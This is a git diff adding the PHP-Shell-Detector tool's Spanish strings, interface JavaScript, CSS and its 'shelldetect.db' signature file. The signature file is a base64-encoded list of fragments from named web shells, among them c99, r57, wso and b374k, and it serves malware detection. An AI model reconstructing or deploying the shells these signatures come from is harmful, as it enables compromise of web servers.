+  $local['<strong>Status</strong>: @count suspicious files found and @shells shells found'] = '<strong>Estado</strong>: @count Archivos sospechosos encontrados @shells shells';
+  $local['Negative'] = 'Negativo';
+  $local['if wrong'] = 'Incorrecto';
+  $local['submit file for analize'] = 'Enviar archivo para analizar';
+  $local['Submit file'] = 'Enviar archivo';
+  $local['Your email'] = 'Tu Email';
+  $local['(in case you want to be notified):'] = '(En canso que quieras ser notificado):';
+  $local['Suspicious behavior found in:'] = 'Comportamiento sospechoso encontrado en:';
+  $local['Please note: file have different owner'] = 'Tenga encuenta que el archivo tiene un propietario diferente';
+  $local['Please note: file have full access permissions'] = 'Tenga en cuenta que el archivo tiene todos los permisos';
+  $local['Owner:'] = 'Propietario:';
+  $local['Permission:'] = 'Pemisos:';
+  $local['Last accessed:'] = 'Ultimo accesso:';
+  $local['Last modified:'] = 'Ultima modificacion:';
+  $local['MD5 hash:'] = 'MD5 hash:';
+  $local['Filesize:'] = 'Tamaño de archivo:';
+  $local['Please wait'] = 'Por favor espere...';
+  $local['Done, report file created'] = 'Finalizado,El reporte a sido creado';
+  $local['Error, report file creation failed'] = 'Error,el reporte no a sido creado';
+  $local['<strong>Error: </strong>'] = '<strong>Error:</strong>';
+  $local[' line: '] = 'Linea:';
+?>
diff --git a/doc/PHP-Shell-Detector-master/media/script.js b/doc/PHP-Shell-Detector-master/media/script.js
new file mode 100644
index 0000000000000000000000000000000000000000..76c500c40c2d41967c880a115922825ef4f50806
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/media/script.js
@@ -0,0 +1,56 @@
+function init() {
+	$("#loader").hide();
+  $("dt").live('click', function() {
+    var text = $(this).children(".plus");
+    if (text.length) {
+      $(this).next("dd").slideToggle();
+      if (text.text() == "+") {
+        text.text("-");
+      }
+      else {
+        text.text("+");
+      }
+    }
+  });
+  $(".showline").live('click', function() {
+    var id = "li"+$(this).attr("id");
+    $( "#"+ id).dialog({height: 440,modal: true, width: 600, title: "Source code"});
+    return false;
+  });
+  $(".source_submit").live('click', function() {
+    var id = "for" + $(this).attr("id");
+    $("#wrap" + id).dialog({
+      autoOpen: false,
+      height: 200,
+      width: 550,
+      modal: true,
+      resizable: false,
+      title: "File submission",
+      buttons: {
+        "Submit file to Websecure": function() {
+          if ($(".ui-dialog-content form").length) {
+            $("#i"+id).removeClass("hidden");
+            $("#"+id).submit();
+            $(".ui-dialog-content form").remove();
+          } else {
+            alert("This file already submited");
+          }
+        },
+        "Submit file to Virustotal": function () {
+          alert(1);
+        }
+      }
+    });
+    $("#wrap" + id).dialog("open");
+    return false;
+  });
+  
+  /*$(".source_submit").click(function() {
+    var id = "for" + $(this).attr("id");
+    $("#"+id).submit();
+    $(this).parent().remove();
+    $("#i"+id).removeClass("hidden");
+    return false;
+  })*/
+}
+$(document).ready(init);
diff --git a/doc/PHP-Shell-Detector-master/media/style.css b/doc/PHP-Shell-Detector-master/media/style.css
new file mode 100644
index 0000000000000000000000000000000000000000..50faac2a2c61f5df12564629962ba36790082621
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/media/style.css
@@ -0,0 +1,261 @@
+body {
+  background-color:#ccc;
+  font:13px tahoma,arial;
+  color:#151515;
+  direction:ltr;
+}
+h1 {
+  text-align:center;
+  font-size:24px;
+}
+dl {
+  margin:0px;
+  padding:0px;
+}
+#content {
+  width:1024px;
+  margin:0px auto;
+  padding:35px 40px;
+  border:1px solid #e8e8e8;
+  background:#fff;
+  overflow:hidden;
+  -webkit-border-radius:7px;
+  -moz-border-radius:7px;
+  border-radius:7px;
+}
+dl dt {
+  cursor:pointer;
+  background:#5f9be3;
+  color:#fff;
+  float:left;
+  font-weight:700;
+  margin-right:10px;
+  width:99%;
+  position:relative;
+  padding:5px
+}
+dl dt .plus {
+  position:absolute;
+  right:4px
+}
+dl dd {
+  margin:2px 0;
+  padding:5px 0
+}
+dl dd dl {
+  margin-top:24px;
+  margin-left:60px
+}
+dl dd dl dt {
+  background:#4FCBA3!important;
+  width:180px!important
+}
+.error {
+  background-color:#FFEBE8;
+  border:1px solid #DD3C10;
+  padding:4px 10px;
+  margin:5px 0px;
+}
+.success {
+  background-color:#fff;
+  border:1px solid #bdc7d8;
+  padding:4px 10px;
+  margin:5px 0px;
+}
+.info {
+  background-color:#fff9d7;
+  border:1px solid #e2c822;
+  padding:4px 10px;
+  margin:5px 0px;
+}
+.clearer {
+  clear:both;
+  height:0px;
+  font-size: 0px;
+}
+.hidden {
+  display:none;
+}
+.green {
+  font-weight: bold;
+  color: #92B901;
+}
+.red {
+  font-weight: bold;
+  color: #DD3C10;
+}
+.orange {
+  font-weight: bold;
+  color: #DD3C10;
+}
+.green small {
+  font-weight: normal !important;
+  color: #151515 !important;
+}
+.filesfound {
+  position: relative;
+}
+.files {
+  position: absolute;
+  left:4px;
+  background-color:#FFF9D7;
+}
+iframe {
+  border:0px;
+  height: 24px;
+  width: 100%;
+}
+.small {
+  font-size: 10px;
+  font-weight:normal;
+}
+.ui-widget-content dl dd dl {
+  margin-left: 0px !important;
+}
+.ui-widget-content input {
+  width: 310px;
+  margin-top: 4px;
+}
+#loader {
+  position: fixed;
+  top: 25%;
+  bottom: 0%;
+  left: 45%;
+  z-index: 99;
+  display: block;
+  text-align: center;
+  width: 100%;
+  padding-top: 125px;
+  text-align: left;
+	font-weight: bold;
+	text-transform: uppercase;
+	text-indent: -20px;
+	font-size: 24px;
+	color: #5F9BE3;
+}
+#circularG {
+	position:relative;
+	width:128px;
+  height:128px
+}
+.circularG {
+	position:absolute;
+	background-color:#5F9BE3;
+	width:29px;
+	height:29px;
+	-webkit-border-radius:19px;
+	-moz-border-radius:19px;
+	-webkit-animation-name:bounce_circularG;
+	-webkit-animation-duration:1.04s;
+	-webkit-animation-iteration-count:infinite;
+	-webkit-animation-direction:linear;
+	-moz-animation-name:bounce_circularG;
+	-moz-animation-duration:1.04s;
+	-moz-animation-iteration-count:infinite;
+	-moz-animation-direction:linear;
+	border-radius:19px;
+	-o-animation-name:bounce_circularG;
+	-o-animation-duration:1.04s;
+	-o-animation-iteration-count:infinite;
+	-o-animation-direction:linear;
+	-ms-animation-name:bounce_circularG;
+	-ms-animation-duration:1.04s;
+	-ms-animation-iteration-count:infinite;
+	-ms-animation-direction:linear;
+}
+#circularG_1 {
+	left:0;
+	top:50px;
+	-webkit-animation-delay:0.39s;
+	-moz-animation-delay:0.39s;
+	-o-animation-delay:0.39s;
+	-ms-animation-delay:0.39s;
+}
+#circularG_2 {
+	left:14px;
+	top:14px;
+	-webkit-animation-delay:0.52s;
+	-moz-animation-delay:0.52s;
+	-o-animation-delay:0.52s;
+	-ms-animation-delay:0.52s;
+}
+#circularG_3 {
+	top:0;
+	left:50px;
+	-webkit-animation-delay:0.65s;
+	-moz-animation-delay:0.65s;
+	-o-animation-delay:0.65s;
+	-ms-animation-delay:0.65s;
+}
+#circularG_4 {
+	right:14px;
+	top:14px;
+	-webkit-animation-delay:0.78s;
+	-moz-animation-delay:0.78s;
+	-o-animation-delay:0.78s;
+	-ms-animation-delay:0.78s;
+}
+#circularG_5 {
+	right:0;
+	top:50px;
+	-webkit-animation-delay:0.9099999999999999s;
+	-moz-animation-delay:0.9099999999999999s;
+	-o-animation-delay:0.9099999999999999s;
+	-ms-animation-delay:0.9099999999999999s;
+}
+#circularG_6 {
+	right:14px;
+	bottom:14px;
+	-webkit-animation-delay:1.04s;
+	-moz-animation-delay:1.04s;
+	-o-animation-delay:1.04s;
+	-ms-animation-delay:1.04s;
+}
+#circularG_7 {
+	left:50px;
+	bottom:0;
+	-webkit-animation-delay:1.1700000000000002s;
+	-moz-animation-delay:1.1700000000000002s;
+	-o-animation-delay:1.1700000000000002s;
+	-ms-animation-delay:1.1700000000000002s;
+}
+#circularG_8 {
+	left:14px;
+	bottom:14px;
+	-webkit-animation-delay:1.3s;
+	-moz-animation-delay:1.3s;
+	-o-animation-delay:1.3s;
+	-ms-animation-delay:1.3s;
+}
+@-webkit-keyframes bounce_circularG {
+	0% {
+		-webkit-transform:scale(1)
+	}
+	100% {
+	-webkit-transform:scale(.3)
+	}
+}
+@-moz-keyframes bounce_circularG {
+	0% {
+		-moz-transform:scale(1)
+	}
+	100% {
+		-moz-transform:scale(.3)
+	}
+}
+@-o-keyframes bounce_circularG {
+	0% {
+		-o-transform:scale(1)
+	}
+	100% {
+		-o-transform:scale(.3)
+	}
+}
+@-ms-keyframes bounce_circularG {
+	0% {
+		-ms-transform:scale(1)
+	}
+	100% {
+		-ms-transform:scale(.3)
+	}
+}
\ No newline at end of file
diff --git a/doc/PHP-Shell-Detector-master/shelldetect.db b/doc/PHP-Shell-Detector-master/shelldetect.db
new file mode 100755
index 0000000000000000000000000000000000000000..8e3d5015188f44606d07bfc9fabc7ff4f34900c4
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/shelldetect.db
@@ -0,0 +1,1065 @@
+YTo2MDQ6e3M6NjQ6IlhScGJ5QXFJQzQzTlNrN0RRb05DaUFnSUNCbWIzSWdLQ1JwSUQwZ01Ec2dK
+R2tnUENBa2JXSmZiR1Z1WjNSb08iO3M6MjE6InBocGVtYWlsZXJbMF1bMl1bcGhwXSI7czo2NDoi
+T3drSkNRb0tDV1JsWm1GMWJIUTZDZ2tKYzJodmQxOXNjeWdwT3dwOUNncG1kVzVqZEdsdmJpQnph
+RzkzWDJ4eiI7czoxNToiY21kWzMxXVswXVtwaHBdIjtzOjY0OiJaZGtvNVRUTlVSM0pJTDJSdlYw
+TTBXRzFCUld0WlZuZEJRMVZRVVdRd1IydzBOM1ZFYWxJaUxDSmpNa2R5YlZSIjtzOjE3OiJub25h
+bWVbMV1bMF1bcGhwXSI7czo2NDoiMmh2SUNJTkNna0pDUWtOQ2drSklDQWdJQWs4ZEhJK0RRb0pD
+UWtnSUNBZ0lDQThkR1FnZDJsa2RHZzlKekV3SiI7czoyMjoiaGlkZGVuc2hlbGxbMF1bMF1bcGhw
+XSI7czo2NDoiY205c09pQnVieTFqWVdOb1pWeHVJanNOQ25CeWFXNTBJQ0pEYjI1MFpXNTBMWFI1
+Y0dVNklIUmxlSFF2YUhSdCI7czoxNDoiY21kWzI0XVswXVtwbF0iO3M6NjQ6Ikp5UGdvZ0lDQWdJ
+Q0FnSUR4aWNpQXZQanhpY2lBdlBpQThMMlp2Ym5RK0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnUEQiO3M6
+MTk6InM3MnNoZWxsWzBdWzBdW3BocF0iO3M6MTI2OiJHUmxabUYxYkhSZmRYTmxYMkZxWVhnZ1BT
+QjBjblZsT3lBa1pHVm1ZWFZzZEY5amFHRnljMlYwSUQwZ0oxZHBibVJ2ZDNNdE1USTFNU2M3SUds
+bUtDRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhSVTUiO3M6MjU6ImNvY2Fj
+b2xhX3NoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBFWlBVazBnUlU1RFZGbFFSVDBpYlhWc2RHbHdZ
+WEowTDJadmNtMHRaR0YwWVNJZ1FVTlVTVTlPUFNKMWNHeHYiO3M6MjY6InNoZWxsX3VwbG9hZGVy
+WzEwXVswXVtwaHBdIjtzOjY0OiJXRnlaMmx1TFd4bFpuUTZOWEI0T3lCdFlYSm5hVzR0Y21sbmFI
+UTZOWEI0T3ljK2JHOW5hVzQ2UEM5emNHRnVQIjtzOjE0OiJjaWhbMF1bMF1bcGhwXSI7czo2NDoi
+WmlrdUlpa2hQQzlpUGp3dlkyVnVkR1Z5UGlJN2ZRMEtJQ0JsYkhObElIdGxZMmh2SUNJOFkyVnVk
+R1Z5UGp4aSI7czoxNToiYzk5WzI2XVswXVtwaHBdIjtzOjY0OiJoYldVb0tTNGlYRzRpT3cwS1B6
+NE5DanhvY2o0OEwzQnlaVDROQ2lBZ0lDQThkR0ZpYkdVK1BHWnZjbTBnYldWIjtzOjIwOiJsYW1h
+c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiRlVsc25Va1ZOVDFSRlgwRkVSRkluWFR0bFkyaHZJQ0ln
+YzJsNlpUMHhOejQ4TDNSa1Bqd3ZkSEkrUEhSeVBqeCI7czoxNzoiamFja2FsWzFdWzBdW3BocF0i
+O3M6NjQ6IkNna0pDV0Z5Y21GNVgzQnZjQ2drWlhoNEtUc05DZzBLQ1FrSlB6NE5DZzBLQ1FrSlJH
+bHlaV04wYjNKNUlFTnYiO3M6MTc6ImNzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJhekUxTUM1a1pT
+OTNMMlJrSWlrN0lBMEtjM2x6ZEdWdEtDSmphRzF2WkNBM056Y2daR1FpS1RzZ0RRcHplWE4wIjtz
+OjE3OiJ0cm95YW5bMF1bMF1bcGhwXSI7czo2NDoiUVowbFNObkpXVUZkdFJqRmFWbXRtZUhKQkx6
+UkhVMUV5SzNaSFoyTkdXVmRhZUZaaWRVbHhZMHcwTWxOTlNUSiI7czoxNzoiYjM3NGtbMTNdWzBd
+W3BocF0iO3M6NjQ6ImxkR012YUhSMGNHUXVZMjl1WmcwS0wyVjBZeTl3ZFhKbExXWjBjR1F1WTI5
+dVpnMEtMMlYwWXk5d2RYSmxMV1oiO3M6MjA6InBocHNoZWxsWzMyXVswXVtwaHBdIjtzOjY0OiJM
+VlVuTENBblkzQTROalluS1RzS0NTUnZjSFJmWTJoaGNuTmxkSE1nUFNBbkp6c0tDV1p2Y21WaFky
+Z29KR05vIjtzOjE5OiJmaWxlc21hbls5XVswXVtwaHBdIjtzOjY0OiJPblIvVlVBalFDWmtOMlFp
+SzJReVMzZ3ZmeUJKZjA1clRXNWVXU3hLTkZsUGQyd21TbWhCYUdNdldDZ3JMbEp4IjtzOjIwOiJj
+eWJlcnNweTVbMF1bMF1bYXNwXSI7czo2NDoiRmpkR2x2YmowbmFIUjBjRG92TDNkM2R5NW9ZWE5v
+WTJobFkydGxjaTVrWlM5b1lYTm9MbU5uYVQ4bk8yUnZZMyI7czoyMDoiZmlsZXNtYW5bMTRdWzBd
+W3BocF0iO3M6NjQ6IjVRVlZRZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOUoxSjFiaWMrRFFvOEww
+WlBVazArRFFvTkNqd2xRQ0J3WVciO3M6MTU6ImNtZFsxOF1bMF1banNwXSI7czo2NDoieWNXMUNj
+RmRGZDNWUmJVVXhNMEUzYmxkWlJXSk5TMWRXTlc0MmNqQmxOQ3Q2YUdSNlVqY3JlRUZUZWtKa1RI
+ZCI7czoyMDoicGhwc2hlbGxbMzNdWzBdW3BocF0iO3M6NTk6IlBHRWdhSEpsWmowaWFIUjBjRG92
+TDNkM2R5NXdiMnhwYzJodVpYZHpMbU52YlM5cGJtUmxlQzV3YUhBIjtzOjI0OiJzcGFtX3RydXN0
+YXBwWzBdWzFdW3BocF0iO3M6NjQ6IlpYTWdQVHhKVGtaUFBpQTdDbU5zYjNObEtFbE9SazhwT3dw
+emVYTjBaVzBvUUd4cGJtVnpLVHNLY0hKcGJuUW4iO3M6MjQ6ImFyYWJfYmxhY2tfaGF0WzBdWzBd
+W3BsXSI7czo2NDoiSUR3dmRHRmliR1UrRFFvZ0lDQWdJQ0FnSUEwS0RRb25PeUFOQ2cwS1B6NE5D
+anhpYjJSNUlHSm5ZMjlzYjNJOSI7czoyMDoiaW5kaXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBE
+OVFTRkFLSkdacGJHVWdQU0JtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMMmhoWTJ0
+bGNteGgiO3M6MTk6InNhdmVmaWxlWzBdWzBdW3BocF0iO3M6NjQ6InljM1JoZEhWeklpazdJQTBL
+SUNBa2MzRnNjWFZwWTJ0c1lYVnVZMmhiWFNBOUlHRnljbUY1S0NKVFpYSjJaWEkiO3M6MTk6Imdu
+eXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6ImNHRnVQand2Wm05dWRENDhabTl1ZENCamIyeHZjajBp
+SXpGRU1VUXhSQ0lnWm1GalpUMGlWR0ZvYjIxaElpQnoiO3M6MTk6ImhhY2tlcnBzWzBdWzBdW3Bo
+cF0iO3M6NjQ6Im1kMGFEb2dJaUF1SUhOMGNteGxiaWdrZEdocGN5MCtZWEpqYUdsMlpTa3BPdzBL
+SUNBZ0lDQWdJQ0JvWldGa1oiO3M6MjU6InBocGZpbGVtYW5hZ2VyWzJdWzJdW3BocF0iO3M6NjQ6
+IkhneU1HWmNlREl6WEhneE4xeDRNREZRWEhneE16RmNlREJrTkdaY2VETmxTMXg0TUdNd1dGeDRN
+VFZjZURFeVgiO3M6MjI6Impvb21sYV9zcGFtWzFdWzFdW3BocF0iO3M6NjQ6ImZVa1ZSVlVWVFZG
+c25kWE5sY2lkZEtTay9KRjlTUlZGVlJWTlVXeWQxYzJWeUoxMDZJaUk3RFFwcFppZ2habWwiO3M6
+MTc6ImphY2thbFswXVswXVtwaHBdIjtzOjY0OiIwTGtadmNtMG9JbTF2WkdVaUtTa0taWGhwZENC
+emRXSUtaVzVrSUdsbUNtVnVaQ0JwWmdvS1NIUnRiRWhsWVdSIjtzOjIyOiJlbG1hbGlzZWtlclsw
+XVswXVthc3BdIjtzOjY0OiJiMk5yWlhRc0lDSlFVa2xXVFZOSElDUndjbWx1ZEd3Z09pQk9iV0Z3
+SUZCdmNuUlRZMkZ1SURFeU9pNGdOSHdnIjtzOjE3OiJpcmNfYm90WzBdWzBdW3BsXSI7czo2NDoi
+SUNBZ0lDQWdJQ0JsWTJodklDSThjSEpsUGlJN0NpQWdJQ0FnSUNBZ0pHTnRaQ0E5SUNna1gxSkZV
+VlZGVTFSYiI7czoxNDoiY21kWzRdWzBdW3BocF0iO3M6NjQ6IkJJSzBSWGExRTVNRlpxWVV0RGRW
+bHhhbkJTUWs1alUzVlpNMjVZUkhaYVZEbGlTazl5TUZsaFFtMUhiWFJxUTIiO3M6MTk6InBocHNo
+ZWxsWzJdWzBdW3BocF0iO3M6NjQ6IlpTQnBaRDBpZEdGaWJHVXlJaUJ6ZEhsc1pUMGlZbTl5WkdW
+eUxXTnZiR3hoY0hObE9pQmpiMnhzWVhCelpUc2kiO3M6MTg6InRlYW1zcWxbMF1bMF1bcGhwXSI7
+czo2NDoiQ1IxY213Z0tRMEtDUWw3RFFvSkNRa2tWVkpNY0dOeklEMGdLQ0J3WVhKelpWOTFjbXdv
+SUNSMWNtd2dLU0FwTyI7czoxNToicGJvdFsxXVswXVtwaHBdIjtzOjY0OiJQRDl3YUhBZ2FXWW9h
+WE56WlhRb0pGOVNSVkZWUlZOVVd5SmpiMjF0Wlc1MElsMHBLU0I3SUdWMllXd29ZbUZ6IjtzOjE1
+OiJjbWRbMjNdWzBdW3BocF0iO3M6NjQ6Imw2WlFvZ0lDQWdJQ0FnSUhWcGJuUWdia1JsWm1GMWJI
+UlVhVzFsVDNWMExBa0pDUWtKQ1M4dklIUnBiV1V0YjMiO3M6MjA6Imluc29tbmlhWzBdWzBdW2Fz
+cHhdIjtzOjY0OiJZakk1Y21GWFZXOUpibHB3WXpKc01HTjVTWE5LU0Zwd1l6SnNNRmt5T1RGaWJs
+RndUM2R2ZGt4NVFUTmhSRkoxIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi
+QklZWFpsYm1GeVpDQXRMVDROQ2p3aExTMGdUVzlrYVdacFpXUWdkRzhnZDI5eWF5QjNhWFJvSURR
+NE5ETndhSCI7czoxNToiY21kWzIxXVswXVtwaHBdIjtzOjY0OiI2WlQwaUlDWWdabWtyTXlBbUlD
+SWdjM1I1YkdVOUlpSmlZV05yWjNKdmRXNWtMV052Ykc5eU9pQnlaMklvTkRnIjtzOjE3OiJhc3B5
+ZHJ2WzBdWzBdW3ZiXSI7czo2NDoiRlNZa295VG5SYVEyUmtVRlF3YVZwdVVuZFlNbHB3WWtkV1pt
+UllRV2xMVTBGblNVaHpaMUZIV2pCalJqbDNaRiI7czoyMDoiOTUxMDc4YmlKWzBdWzBdW3BocF0i
+O3M6NjQ6InRCUWxwNFFVaG1OazVKTVZSMlUyMDJiMFI0U2xvd1EyTTVibFpITlhCcWVHMDFXRGxh
+UkdFeVVVTkZXR0VyVkUiO3M6MjA6InBocHNoZWxsWzE1XVswXVtwaHBdIjtzOjY0OiJDQmpiMnh2
+Y2oxbmNtVmxiajRrWkM4a1pHVnNYMllnUkVWTVJWUkZSQ0U4TDJadmJuUStQQzlpUGcwS1BHSnlQ
+IjtzOjE4OiJuc3R2aWV3WzBdWzBdW3BocF0iO3M6NjQ6Ilcxd0xuTnhiQ0lwT3cwS0lDQWdJQ0Fn
+SUNCb1pXRmtaWElvSWtOdmJuUmxiblF0Vkhsd1pUb2dkR1Y0ZEM5d2IiO3M6MjA6ImZpbGVzbWFu
+WzEyXVswXVtwaHBdIjtzOjY0OiJ0TFMwdExTMHRMUzB0TFMwdExTMHRMUXB6ZFdJZ1JHOTNibXh2
+WVdSR2FXeGxDbnNLQ1NNZ2FXWWdibThnWm1sIjtzOjIwOiJ1bml0eHNoZWxsWzBdWzBdW3BsXSI7
+czo2NDoiWkhZWEpRWm5KbE9YQTVLMmhSVm5WTlZUTjFWbWgyTkdWVU56SnlVa2xMU1hwTkwxTkll
+RVk0ZVRkc1F6bExaVCI7czoxNzoicGhwc3B5WzJdWzBdW3BocF0iO3M6NjQ6IkFnSUR3dmRISStE
+UW9nSUNBZ0lDQWdJRHd2ZEdGaWJHVStEUW9nSUNBZ0lDQWdJRHgwWlhoMFlYSmxZU0J1WVciO3M6
+MjM6ImFudGlzZWNzaGVsbFsyXVswXVtwaHBdIjtzOjU2OiJhSFIwY0Rvdkx6azFMakUyT0M0eE9U
+RXVNVEUyTDBkbGRFeHBibXR6TG1GemFIZy9hRzl6ZEQwPSI7czoxOToiZ2V0bGlua3NbMF1bMV1b
+cGhwXSI7czo2NDoiYVc0Z1hDSmJKVEpkWENJNlhHNWJKVEZkSWl3S0owdHZjSGxoYkdGZlptbHNa
+WE1uSUQwK0lDZERiM0JwYnlCeCI7czoxOToiaW1oYXBmdHBbMF1bMF1bcGhwXSI7czo2NDoiNkwy
+RndjSE5sY25ZdmQzZDNMM05vWld4c2N5OGlQZ29nSUNBZ0lDQWdJRHhtYjI1MElHTnZiRzl5UFNJ
+alJFTiI7czoyMzoic3RyZXNzYnlwYXNzWzBdWzBdW3BocF0iO3M6NjQ6IjBnYzNwRFRVUXNJSE42
+VkdWdGNFWnBiR1VLQ2s5dUlFVnljbTl5SUZKbGMzVnRaU0JPWlhoMENnb25JQzB0SUciO3M6MTQ6
+ImNtZFsxXVswXVthc3BdIjtzOjY0OiI5dGJXRnVaRG9nUEdsdWNIVjBJRzVoYldVZ1BTQW5ZMjFr
+Sno1Y2JpSTdEUW9nSUNBZ0lDQWdJQ0JsWTJodklDIjtzOjIwOiJkYXJrc2hlbGxbMF1bMF1bcGhw
+XSI7czo3OiJ2ZXJzaW9uIjtzOjEwOiIxNDA1Njc0OTQ3IjtzOjY0OiJpY3ZjSFZpYkdsalgyaDBi
+V3d2YVc1akwyTnZibVpwWnk1cGJtTXVjR2h3Snl3a2RYTmxjaTRuTFRNekxuUjRkIjtzOjIwOiJj
+b25maWdzcHlbMV1bMF1bcGhwXSI7czo2NDoiVkRCTlJqaEVhM054Y1ZKalZsQnZUMUZrVW0xaGNX
+YzNlRXh2ZUdNclMxRkxVSEUzTjNwNk9WQmllSGxXWWxkTSI7czoxNToiaXNrb1swXVswXVtwaHBd
+IjtzOjY0OiJ0WlNnZ0pGOUdTVXhGVTFzbmRYQnNiMkZrWldSbWFXeGxKMTFiSjI1aGJXVW5YU2tn
+YjNJZ1pHbGxLQ1JsY25KIjtzOjI1OiJwaHBmaWxlbWFuYWdlcls0XVswXVtwaHBdIjtzOjY0OiJJ
+RzVoYldVOVhDSmZZMjFrWENJZ2RtRnNkV1U5WENJaUxpUmpkWEp5Wlc1MFEwMUVMaUpjSWo0OEwz
+UmtQaUk3IjtzOjE2OiJ3b3JzZVswXVswXVtwaHBdIjtzOjY0OiJmWkhWdGNDazdDbVZzYzJVS2V3
+cHBaaWdoSkhSdlgyWnBiR1VwQ25zS2FHVmhaR1Z5S0NkRGIyNTBaVzUwTFZSIjtzOjE1OiJ6YWNv
+WzBdWzBdW3BocF0iO3M6NjQ6Im5JZ0x6NGlPaWNuS1M0aVBDOTBaRDRpT3cwS0lDQWdmUTBLSUNB
+Z0pITnhiR1J5TGowaVBDOTBjajVjYmlJN0QiO3M6MTY6Im15c3FsWzZdWzJdW3BocF0iO3M6NjQ6
+IlRHUkRlVXNOQ2xWUlJtdG9ZbUkyVHpoa00zUXlMek5xVWxSS0wwbHhVM2REUVVsclJWcEJSVE5p
+TVdKQ2RUWTQiO3M6MjQ6InNlcnZlcl9jb25maWdbMF1bMF1bcGhwXSI7czo2NDoiUnNaVDROQ2lB
+OGMzUjViR1UrRFFvZ0lDQjBaQ0I3RFFvZ0lDQm1iMjUwTFdaaGJXbHNlVG9nZG1WeVpHRnVZUyI7
+czoxODoiY3J5c3RhbFsyXVswXVtwaHBdIjtzOjY0OiJCak9UbHdhSEJwWTNFdWNHaHdJRDhnYUhS
+MGNEb3ZMMk5qZEdWaGJTNXVkV3RzWlc5dUxuVnpEUW9qSXlNakl5IjtzOjE1OiJjOTlbMjldWzBd
+W3BocF0iO3M6NjQ6ImdKeUFnUm1sc1pUb2dJQ0FnUTIxa1FYTndMbUZ6Y0EwS0lDQW5JQ0JCZFhS
+b2IzSTZJQ0JOWVdObGJ5QThiV0YiO3M6MTU6ImNtZFsxNl1bMF1bYXNwXSI7czo2NDoiYVUxTlEy
+RjZheTgxTjBGbGJuVjBiamRXVGxOa2FVRlVTWGxOTDNob2VrNTJZemt5WlRGMVJWZzJVMDkzTkhr
+MCI7czoyNzoiYWhsaXN5dXJnYV9zaGVsbFswXVswXVtwaHBdIjtzOjY0OiI0a2MzUnlLVHNOQ2dr
+SkNRa0pZbkpsWVdzN0RRb0pDUWtKWTJGelpTQW5iWGx6Y1d3bk9nMEtDUWtKQ1FseVpYIjtzOjE0
+OiJ3c29bMF1bMF1bcGhwXSI7czo2NDoiYVV0VFFuWmphVUo2WkVoS2NHTXpVbmxMUTFKNVdsZGFi
+R050Vm5sTVEwb3pXbGRLYUdKSVVtaEphV3RuWWpOSiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTVd
+WzBdW3BocF0iO3M6MTM1OiI1YjE5ZnhxMzBqRDhkL3dwNUMybkN3M0dnSk9jMURiRWlXTW5UaE03
+OVV1U0pzNU5GMWhnNjRXbHU0dXhtK1B2ZnMrTVhsYmFGOEJwejNYZHorOXhHeHVrMFdqME5ock5q
+RWFsWHVBSElXc3g2NGYrNExHMXMxYnF1d05uNXNlZFdlUjJuRCsiO3M6MTQ6Indzb1s1XVswXVtw
+aHBdIjtzOjY0OiJpOHZWVzUwZFdzZ2IzQjBhVzFoYkdsellYTnBJSFZyZFhKaGJpQmtZVzRnYTJW
+alpYQmhkR0Z1TGdva2FXMW5aIjtzOjE4OiJiYXRhdmk0WzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNB
+Z0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdSMWNESW9hVzV6
+YjIiO3M6MTk6ImJsaW5kc2hlbGxbMF1bMF1bY10iO3M6NjQ6ImJXVWdMbWgwY0dGemMzZGtJajRO
+Q2drSlptbHVaQ0JoYkd3Z0xtaDBjR0Z6YzNka0lHWnBiR1Z6UEM5dmNIUnAiO3M6MTg6ImNyeXN0
+YWxbMV1bMF1bcGhwXSI7czo2NDoiRVJSYjBwRFVXdEtRMVJXYW1GRVNXZGhTRkowWWtoT2QwNVhU
+VEJOVjNocVlVUkdlV041YUVGYWJra3hUVmRSYiI7czoxODoicjNsYXBzM1swXVswXVtwaHBdIjtz
+OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSkhaMklEMGdabUZzYzJVN0NpQWdJQ0FnSUNBZ0lDQWdJQ0Fn
+SUNBZ0lDQWdJQ0FnIjtzOjE5OiJ3M2RzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJsWUt5OXRjVVE0
+YjJGVmFsaHdiekJOVGswM1pWVXJNalk0UnpkV09GcDBVa1J1YUZweFNEUkNOR1ZMVTNRMFpGIjtz
+OjE2OiJiMzc0a1s2XVswXVtwaHBdIjtzOjY0OiJWd3BsWVdnMFF6VkxkVWR0YUUweGJWZzBiSGhL
+VWtvM1JERlNkM296VmxsdVJGQklZazVzV1hJNVZ5dHhRblpXIjtzOjE2OiJiMzc0a1s0XVswXVtw
+aHBdIjtzOjY0OiJkQ0k3THk5bWIzSnRZWFJ2RFFva1NHRjRjR3h2Y21WeVgyRmtaSEk5SkhKbGJX
+OTBaVjloWkdSeUxpSjBiMjlzIjtzOjI0OiJhbGJhbmlhbnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6
+InNnWlhocGREc2dmU0JsYkhObElIc05DZ2tKSm5SNWNHVW9KR05vWVc0c0pHSjFaeXdrWkc5eWF5
+d2lSR1ZOYjMiO3M6MTk6Imhvc3RkZXZpbFswXVswXVtwbF0iO3M6NjQ6ImhiSE5sS1NCN0RRb0pD
+UWtKYVdZZ0tDUm1JQ0U5SUNjdUp5QW1KaUFrWmlBaFBTQW5MaTRuSUNZbUlDRmtaV3ciO3M6MjI6
+IjQyMDUzMnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IjFwY1hRcmVFUm1Tek5CVFRkeVlXMTVRa1pT
